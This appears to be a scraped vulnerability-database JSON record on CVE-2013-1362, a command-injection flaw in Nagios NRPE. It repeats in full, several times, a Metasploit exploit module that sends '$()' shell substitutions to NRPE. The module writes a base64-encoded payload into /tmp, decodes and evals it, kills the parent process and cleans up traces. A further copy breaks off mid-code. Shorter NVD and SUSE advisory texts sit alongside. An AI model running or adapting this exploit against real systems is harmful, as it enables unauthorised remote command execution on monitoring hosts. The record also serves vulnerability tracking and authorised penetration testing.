"OPENVAS:1361412562310865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-03-14T12:50:57"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-03-14T12:50:57", "differentElements": ["modified", "published"], "edition": 89}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "bcf0013cb10e4d36a9c4a433070f246b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-04-09T00:05:18", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "nessus", "idList": ["NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:850460", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-04-09T00:05:18"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-04-09T00:05:18", "differentElements": ["modified", "published"], "edition": 90}], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:850460", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-04-09T02:02:52"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"cve": [{"lastseen": "2018-11-01T05:14:09", "bulletinFamily": "NVD", "description": "Incomplete blacklist vulnerability in nrpc.c in Nagios Remote Plug-In Executor (NRPE) before 2.14 might allow remote attackers to execute arbitrary shell commands via \"$()\" shell metacharacters, which are processed by bash.", "modified": "2018-10-30T12:27:33", "published": "2013-07-09T13:55:00", "id": "CVE-2013-1362", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1362", "title": "CVE-2013-1362", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:31:29", "bulletinFamily": "unix", "description": "Nagios NRPE was updated to add more blacklisting to avoid\n shell injection via nagios request packets (CVE-2013-1362).\n\n Security Issues:\n\n * CVE-2013-1362\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362</a>\n >\n\n", "modified": "2013-07-19T00:04:17", "published": "2013-07-19T00:04:17", "id": "SUSE-SU-2013:1219-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00023.html", "title": "Security update for nagios-nrpe, nagios-plugins-nrpe (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:35:14", "bulletinFamily": "unix", "description": "NRPE (the Nagios Remote Plug-In Executor) allows the\n passing of $() to plugins/scripts which, if run under bash,\n will execute that shell command under a subprocess and pass\n the output as a parameter to the called script. Using this,\n it is possible to get called scripts, such as check_http,\n to execute arbitrary commands under the uid that\n NRPE/nagios is running as (typically, 'nagios').\n\n With this update NRPE will deny remote requests containing\n a bash command substitution.\n\n", "modified": "2013-04-04T17:05:36", "published": "2013-04-04T17:05:36", "id": "OPENSUSE-SU-2013:0621-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-04/msg00005.html", "type": "suse", "title": "NRPE metacharacter filtering omission (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:21:38", "bulletinFamily": "unix", "description": "NRPE (the Nagios Remote Plug-In Executor) allows the\n passing of $() to plugins/scripts which, if run under bash,\n will execute that shell command under a subprocess and pass\n the output as a parameter to the called script. Using this,\n it is possible to get called scripts, such as check_http,\n to execute arbitrary commands under the uid that\n NRPE/nagios is running as (typically, 'nagios').\n\n With this update NRPE will deny remote requests\n containing a bash command substitution.\n\n", "modified": "2013-04-04T18:04:33", "published": "2013-04-04T18:04:33", "id": "OPENSUSE-SU-2013:0624-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-04/msg00006.html", "title": "NRPE metacharacter filtering omission (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-02-19T23:28:19", "bulletinFamily": "exploit", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "modified": "2013-04-12T00:00:00", "published": "2013-04-12T00:00:00", "id": "1337DAY-ID-20645", "href": "https://0day.today/exploit/description/20645", "type": "zdt", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n#\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\r\n 'Description' => %q{\r\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\r\n Nagios server to actively poll information from the hosts it monitors. NRPE\r\n has a configuration option dont_blame_nrpe which enables command-line arguments\r\n to be provided remote plugins. When this option is enabled, even when NRPE makes\r\n an effort to sanitize arguments to prevent command execution, it is possible to\r\n execute arbitrary commands.\r\n },\r\n 'Author' =>\r\n [\r\n 'Rudolph Pereir', # Vulnerability discovery\r\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1362' ],\r\n [ 'OSVDB', '90582'],\r\n [ 'BID', '58142'],\r\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'perl python ruby bash telnet',\r\n # *_perl, *_python and *_ruby work if they are installed\r\n }\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 21 2013'\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(5666),\r\n OptEnum.new('NRPECMD', [\r\n true,\r\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\r\n 'check_procs',\r\n ['check_procs', 'check_users', 'check_load', 'check_disk']\r\n ]),\r\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\r\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\r\n ], self.class)\r\n end\r\n\r\n def send_message(message)\r\n packet = [\r\n 2, # packet version\r\n 1, # packet type, 1 => query packet\r\n 0, # checksum, to be added later\r\n 0, # result code, discarded for query packet\r\n message, # the command and arguments\r\n 0 # padding\r\n ]\r\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\r\n begin\r\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\r\n res = self.sock.get_once # get the response\r\n rescue ::EOFError => eof\r\n res = \"\"\r\n end\r\n\r\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\r\n end\r\n\r\n def setup\r\n @ssl_socket = nil\r\n @force_ssl = false\r\n super\r\n end\r\n\r\n def exploit\r\n\r\n if check != Exploit::CheckCode::Vulnerable\r\n fail_with(Exploit::Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\r\n end\r\n\r\n stage = \"setsid nohup #{payload.encoded} & \"\r\n stage = Rex::Text.encode_base64(stage)\r\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\r\n command = datastore['NRPECMD']\r\n command << \"!\"\r\n command << \"$($(rm -f /tmp/$$)\" # Delete the file if it exists\r\n # need a way to write to a file without using redirection (>)\r\n # cant count on perl being on all linux hosts, use GNU Sed\r\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\r\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # 